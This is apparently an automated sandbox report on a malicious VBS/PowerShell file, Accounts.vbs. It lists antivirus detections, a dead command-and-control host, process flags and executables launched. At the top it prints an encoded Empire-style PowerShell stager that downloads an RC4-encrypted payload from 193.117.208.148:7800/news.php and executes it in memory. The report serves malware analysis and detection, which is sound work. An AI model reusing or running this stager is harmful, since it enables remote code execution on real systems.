ATgB0AGkATgBVAGUAPQAwADsAJABCAGEAMAA9AE4ARQB3AC0ATwBiAGoAZQBDAHQAIABTAHkAcwB0AGUAbQAuAE4ARQB0AC4AVwBFAEIAQwBMAEkAZQBOAFQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAIABXAE8AVwA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMAA7ACAAcgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQBjAGsAbwAnADsAJABzAGUAcgA9ACQAKABbAFQARQB4AFQALgBFAE4AQwBvAEQASQBOAGcAXQA6ADoAVQBuAEkAQwBvAGQAZQAuAEcARQB0AFMAVAByAEkATgBHACgAWwBDAE8ATgB2AGUAcgB0AF0AOgA6AEYAcgBvAE0AQgBhAHMAZQA2ADQAUwBUAFIAaQBOAGcAKAAnAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AdwBBAHUAQQBEAEUAQQBNAFEAQQAzAEEAQwA0AEEATQBnAEEAdwBBAEQAZwBBAEwAZwBBAHgAQQBEAFEAQQBPAEEAQQA2AEEARABjAEEATwBBAEEAdwBBAEQAQQBBACcAKQApACkAOwAkAHQAPQAnAC8AbgBlAHcAcwAuAHAAaABwACcAOwAkAGIAQQAwAC4ASABlAEEARABlAFIAcwAuAEEARABEACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA7ACQAQgBhADAALgBQAHIATwBYAHkAPQBbAFMAWQBTAFQARQBNAC4ATgBFAHQALgBXAEUAYgBSAEUAUQB1AGUAUwBUAF0AOgA6AEQAZQBmAGEAdQBMAHQAVwBlAEIAUAByAE8AeAB5ADsAJABiAGEAMAAuAFAAcgBvAFgAWQAuAEMAUgBlAGQARQBuAFQASQBBAGwAcwAgAD0AIABbAFMAeQBTAHQAZQBtAC4ATgBlAHQALgBDAHIAZQBEAGUAbgBUAEkAYQBsAEMAYQBDAGgARQBdADoAOgBEAGUAZgBhAFUATAB0AE4AZQBUAHcATwBSAEsAQwByAEUAZABFAG4AdABJAEEAbABTADsAJABTAGMAcgBpAHAAdAA6AFAAcgBvAHgAeQAgAD0AIAAkAGIAYQAwAC4AUAByAG8AeAB5ADsAJABLAD0AWwBTAHkAUwBUAGUAbQAuAFQARQBYAHQALgBFAE4AQwBvAEQASQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAFQAQgBZAHQARQBzACgAJwBkADQALAAwAGcAawBAAFsAUAAqACEALwBmAHMAdABhADoAYgA3AFEAQgBoAGwAVQBEAHIANgB4AEUAXQAzAF8AJwApADsAJABSAD0AewAkAEQALAAkAEsAPQAkAEEAUgBnAHMAOwAkAFMAPQAwAC4ALgAyADUANQA7ADAALgAuADIANQA1AHwAJQB7ACQASgA9ACgAJABKACsAJABTAFsAJABfAF0AKwAkAEsAWwAkAF8AJQAkAEsALgBDAE8AdQBuAFQAXQApACUAMgA1ADYAOwAkAFMAWwAkAF8AXQAsACQAUwBbACQASgBdAD0AJABTAFsAJABKAF0ALAAkAFMAWwAkAF8AXQB9ADsAJABEAHwAJQB7ACQASQA9ACgAJABJACsAMQApACUAMgA1ADYAOwAkAEgAPQAoACQASAArACQAUwBbACQASQBdACkAJQAyADUANgA7ACQAUwBbACQASQBdACwAJABTAFsAJABIAF0APQAkAFMAWwAkAEgAXQAsACQAUwBbACQASQBdADsAJABfAC0AQgB4AG8AcgAkAFMAWwAoACQAUwBbACQASQBdACsAJABTAFsAJABIAF0AKQAlADIANQA2AF0AfQB9ADsAJABiAGEAMAAuAEgAZQBhAEQARQByAHMALgBBAEQAZAAoACIAQwBvAG8AawBpAGUAIgAsACIAcQBHAFYAVABTAHkAPQBUAEoAWAB1AFgAVgBBAHUAZQBwADQAYgBuADcANABFAEwATwAzAFcAMgBUAEoAcABzAFIAZwA9ACIAKQA7ACQAZABhAHQAQQA9ACQAYgBhADAALgBEAE8AVwBOAGwAbwBBAGQARABBAFQAQQAoACQAUwBFAFIAKwAkAFQAKQA7ACQAaQBWAD0AJABEAEEAVABBAFsAMAAuAC4AMwBdADsAJABEAGEAVABBAD0AJABEAEEAVABBAFsANAAuAC4AJABEAEEAVABBAC4AbABlAG4AZwB0AEgAXQA7AC0ASgBvAEkATgBbAEMAaABBAFIAWwBdAF0AKAAmACAAJABSACAAJABkAEEAVABBACAAKAAkAEkAVgArACQASwApACkAfABJAEUAWAA=

Creates a suspicious Powershell process (2 events)

option	-nop				value	Does not load current user profile
option	-nop				value	Does not load current user profile

Connects to an IP address that is no longer responding to requests (legitimate services will remain up-and-running usually) (1 event)

dead_host

193.117.208.148:7800

File has been identified by 32 AntiVirus engines on VirusTotal as malicious (32 events)

Lionic	Trojan.Script.Generic.4!c
CAT-QuickHeal	Script.Trojan.39876
McAfee	PS/Dropper.f
ALYac	GT:VB.Laburrak.14.29C080A2
VIPRE	GT:VB.Laburrak.14.29C080A2
Sangfor	Malware.Generic-VBS.Save.f99adb70
Arcabit	GT:VB.Laburrak.14.29C080A2
Symantec	Trojan.Malscript!gen8
ESET-NOD32	PowerShell/TrojanDownloader.Agent.ABM
Avast	VBS:Downloader-AXD [Trj]
Cynet	Malicious (score: 99)
Kaspersky	HEUR:Trojan.PowerShell.Generic
BitDefender	GT:VB.Laburrak.14.29C080A2
NANO-Antivirus	Trojan.Script.Downloader.inbiqr
MicroWorld-eScan	GT:VB.Laburrak.14.29C080A2
Emsisoft	GT:VB.Laburrak.14.29C080A2 (B)
F-Secure	Malware.VBS/PSRunner.VPSV
McAfee-GW-Edition	PS/Dropper.f
FireEye	GT:VB.Laburrak.14.29C080A2
Sophos	ATK/Empire-U
Ikarus	Trojan-Downloader.PowerShell.Agent
Avira	VBS/PSRunner.VPSV
Xcitium	TrojWare.Win32.BadShell.XSN@7pmib7
Microsoft	VirTool:PowerShell/Empire.gen!A
ZoneAlarm	HEUR:Trojan.PowerShell.Generic
GData	GT:VB.Laburrak.14.29C080A2
Google	Detected
AhnLab-V3	Powershell/Downloader.S5
Tencent	Heur:Trojan.Powershell.Generic.u
MAX	malware (ai score=87)
Fortinet	PowerShell/Agent.AN!tr
AVG	VBS:Downloader-AXD [Trj]

The processes wscript.exe, powershell.exe wrote an executable file to disk which it then attempted to execute (20 events)

file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

Accounts.vbs

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All